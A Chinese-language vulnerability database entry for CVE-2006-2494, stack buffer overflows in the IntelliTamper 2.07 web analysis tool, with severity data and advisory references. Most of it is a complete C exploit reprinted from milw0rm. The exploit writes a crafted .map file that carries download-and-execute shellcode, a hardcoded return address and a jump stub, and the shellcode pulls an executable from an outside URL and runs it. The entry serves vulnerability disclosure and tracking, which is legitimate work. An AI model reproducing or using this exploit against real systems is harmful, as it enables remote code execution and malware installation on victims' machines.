IntelliTamper 多个缓冲区溢出漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110306 漏洞类型 缓冲区溢出
发布时间 2006-05-19 更新时间 2008-07-21
CVE编号 CVE-2006-2494 CNNVD-ID CNNVD-200605-366
漏洞平台 Windows CVSS评分 5.1
|漏洞来源
https://www.exploit-db.com/exploits/1806
https://www.securityfocus.com/bid/18039
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-366
|漏洞详情
IntelliTamper是用于拦截网站弹出窗口的浏览器插件。IntelliTamper中存在多个缓冲区溢出漏洞,如果用户受骗访问了恶意网页的话就可能导致执行任意指令。1)在读取.map文件时存在多个栈溢出。如果用户打开的地图文件中包含有大于4096字节的行或大于480字节的FOLDER##行的话,就会触发这些溢出。2)如果网页中包含有大于512字节的超长链接的话,扫描该网页就会触发栈溢出。3)在处理扫描站点的HTTP响应时存在栈溢出。如果响应中包含有超过512字节的超长Server头的话,就会触发这个溢出。
|漏洞EXP
///////////////////////////////////////////////////////////////////
//++
// IntelliTamper web analysis ( *.Map File Handling Local Exploit )
//
// Discovery By: Devil00 [ o.y.6@hotmail.com ]
// Coded By: JAAScois [ http://www.jaascois.com ]
//++
///////////////////////////////////////////////////////////////////
// Test on: IntelliTamper v2.07

#include <stdio.h>
#include <string.h>

// shellcode [ download & run executive file ]
unsigned char shellcode[] =
"\xEB\x5D\x5F\x8B\xF7\x80\x3F"
"\x08\x75\x03\x80\x37\x08\x47\x80\x3F\x01\x75\xF2\x33\xC9\xB5\x05\x8B\xFE\x2B\xF9"
"\x8B\xEF\xB5\x03\x2B\xF9\x8B\xD7\xB2\x7C\x8B\xE2\x89\x75\xFC\xB5\x40\xC1\xE1\x08"
"\x89\x4D\xF8\x8D\x49\x3C\x8B\x09\x03\x4D\xF8\x8D\x49\x7F\x41\x8B\x09\x03\x4D\xF8"
"\x8B\xD9\x8B\x49\x0C\x03\x4D\xF8\x81\x39\x4B\x45\x52\x4E\x74\x07\x8D\x5B\x14\x8B"
"\xCB\xEB\xEB\x33\xC0\x53\xEB\x02\xEB\x7C\x8B\x33\x03\x75\xF8\x80\x7E\x03\x80\x74"
"\x14\x8B\x3E\x03\x7D\xF8\x47\x47\x56\x8B\x75\xFC\x33\xC9\xB1\x0D\xF3\xA6\x5E\x74"
"\x06\x40\x8D\x76\x04\xEB\xE0\x5B\x8B\x5B\x10\x03\x5D\xF8\xC1\xE0\x02\x03\xD8\x8B"
"\x03\x89\x45\xF4\x8B\x5D\xFC\x8D\x5B\x0D\x53\xFF\xD0\x89\x45\xF0\x8D\x5B\x09\x53"
"\x8B\x45\xF4\xFF\xD0\x89\x45\xEC\x8B\x45\xF0\x8B\x40\x3C\x03\x45\xF0\x8B\x40\x78"
"\x03\x45\xF0\x89\x45\xE8\x8B\x40\x20\x03\x45\xF0\x8D\x7B\x08\x33\xD2\x57\x8B\x30"
"\x03\x75\xF0\x33\xC9\xB1\x0F\xF3\xA6\x74\x0B\x5F\xEB\x02\xEB\x7A\x42\x8D\x40\x04"
"\xEB\xE7\x8B\x5D\xE8\x33\xC9\x53\x5F\x8B\x7F\x24\x03\x7D\xF0\xD1\xE2\x03\xFA\x66"
"\x8B\x0F\x8B\x5B\x1C\x03\x5D\xF0\xC1\xE1\x02\x03\xD9\x8B\x1B\x03\x5D\xF0\x89\x5D"
"\xE4\x8B\x55\xFC\x8D\x52\x2D\x8D\x7D\xE0\x33\xC9\xB1\x06\x51\x52\x52\x8B\x75\xF0"
"\x56\xFC\xFF\xD3\xFD\xAB\x5A\x59\x38\x2A\x74\x03\x42\xEB\xF9\x42\xE2\xE8\xB1\x04"
"\x51\x52\x52\x8B\x75\xEC\x56\xFC\xFF\xD3\xFD\xAB\x5A\x59\x38\x2A\x74\x03\x42\xEB"
"\xF9\x42\xE2\xE8\xFC\x52\x33\xD2\xB6\x1F\xC1\xE2\x08\x52\x33\xD2\xEB\x02\xEB\x7C"
"\x52\x8B\x45\xD8\xFF\xD0\x5B\x89\x45\xB8\x33\xD2\x52\x52\x52\x52\x53\x8B\x45\xC8"
"\xFF\xD0\x89\x45\xB4\x8D\x7B\x08\x33\xD2\x52\xB6\x80\xC1\xE2\x10\x52\x33\xD2\x52"
"\x52\x57\x50\x8B\x45\xC4\xFF\xD0\x89\x45\xB0\x8D\x55\xAC\x52\x33\xD2\xB6\x1F\xC1"
"\xE2\x08\x52\x8B\x4D\xB8\x51\x50\x8B\x45\xC0\xFF\xD0\x8B\x4D\xB0\x51\x8B\x45\xBC"
"\xFF\xD0\x8B\x4D\xB4\x51\x8B\x45\xBC\xFF\xD0\x33\xD2\x52\x43\x43\x53\x8B\x45\xE0"
"\xFF\xD0\x89\x45\xA8\x8B\x7D\xAC\x57\x8B\x55\xB8\x52\x50\x8B\x45\xDC\xFF\xD0\x8B"
"\x55\xA8\xEB\x02\xEB\x17\x52\x8B\x45\xD4\xFF\xD0\x33\xD2\x52\x53\x8B\x45\xD0\xFF"
"\xD0\x33\xD2\x52\x8B\x45\xCC\xFF\xD0\xE8\x0D\xFE\xFF\xFF\x4C\x6F\x61\x64\x4C\x69"
"\x62\x72\x61\x72\x79\x41\x08\x4B\x45\x52\x4E\x45\x4C\x33\x32\x08\x57\x49\x4E\x49"
"\x4E\x45\x54\x08\x47\x65\x74\x50\x72\x6F\x63\x41\x64\x64\x72\x65\x73\x73\x08\x5F"
"\x6C\x63\x72\x65\x61\x74\x08\x5F\x6C\x77\x72\x69\x74\x65\x08\x47\x6C\x6F\x62\x61"
"\x6C\x41\x6C\x6C\x6F\x63\x08\x5F\x6C\x63\x6C\x6F\x73\x65\x08\x57\x69\x6E\x45\x78"
"\x65\x63\x08\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73\x08\x49\x6E\x74\x65\x72"
"\x6E\x65\x74\x4F\x70\x65\x6E\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x4F\x70\x65"
"\x6E\x55\x72\x6C\x41\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x52\x65\x61\x64\x46\x69"
"\x6C\x65\x08\x49\x6E\x74\x65\x72\x6E\x65\x74\x43\x6C\x6F\x73\x65\x48\x61\x6E\x64"
"\x6C\x65\x08\x72\x08\x78\x2E\x65\x78\x65\x08"
"http://www.jaascois.com/research/36601021/virus.exe" //<< The File Will 
DOWN & RUN [ not a real virus ]
"\x08\x01";

// Return Code:
unsigned char return_code[] =
"\x83\xC5\x48"
"\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64"
"\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64\x83\xC5\x64"
"\xFF\xE5\x33\xC0\x74\xBB";


int main(int argc, char* argv[])
{
FILE *hfile;
unsigned long Retaddr;
unsigned char buf[11160];

printf("IntelliTamper web analysis ( *.Map File Handling Local Exploit 
)\n\n");
printf(" Discovery By: Devil 00 [ o.y.6@hotmail.com ]\n");
printf(" Coded By: JAAScois [ http://www.jaascois.com ]\n");

// fill nop's
for(int k=0;k<11160;k++){
buf[k]=0x90;
}
// ..... ..... ...... ..... ... .... ..... ...... ... ........
strcpy((char*)&buf[0],(char*)&shellcode[0]);
buf[strlen((char*)shellcode)]=0x90;

// ...... ... ..... ........ .... ........
Retaddr=0x004055DF;
memcpy(&buf[11156],&Retaddr,4);

// ... ..... ..... ..... ..... ........ ...... ...... ....
memcpy(&buf[11087],&return_code[0],69);

hfile=fopen("WebSite.map","w+b");
if(hfile==NULL){
printf("-Error: fopen \n");
return 1;
}

fwrite(buf,11160,1,hfile);
fclose (hfile);

return 0;
}// JAAScois.com 17/05/2006

// milw0rm.com [2006-05-19]
|受影响的产品
IntelliTamper IntelliTamper 2.07
|参考资料

来源:VUPEN
名称:ADV-2006-1860
链接:http://www.frsirt.com/english/advisories/2006/1860
来源:SECTRACK
名称:1016117
链接:http://securitytracker.com/id?1016117
来源:SECUNIA
名称:20172
链接:http://secunia.com/advisories/20172
来源:XF
名称:intellitamper-map-bo(26551)
链接:http://xforce.iss.net/xforce/xfdb/26551
来源:BID
名称:18039
链接:http://www.securityfocus.com/bid/18039
来源:MILW0RM
名称:1806
链接:http://www.milw0rm.com/exploits/1806
来源:VUPEN
名称:ADV-2008-2120
链接:http://www.frsirt.com/english/advisories/2008/2120
来源:MILW0RM
名称:1806
链接:http://milw0rm.com/exploits/1806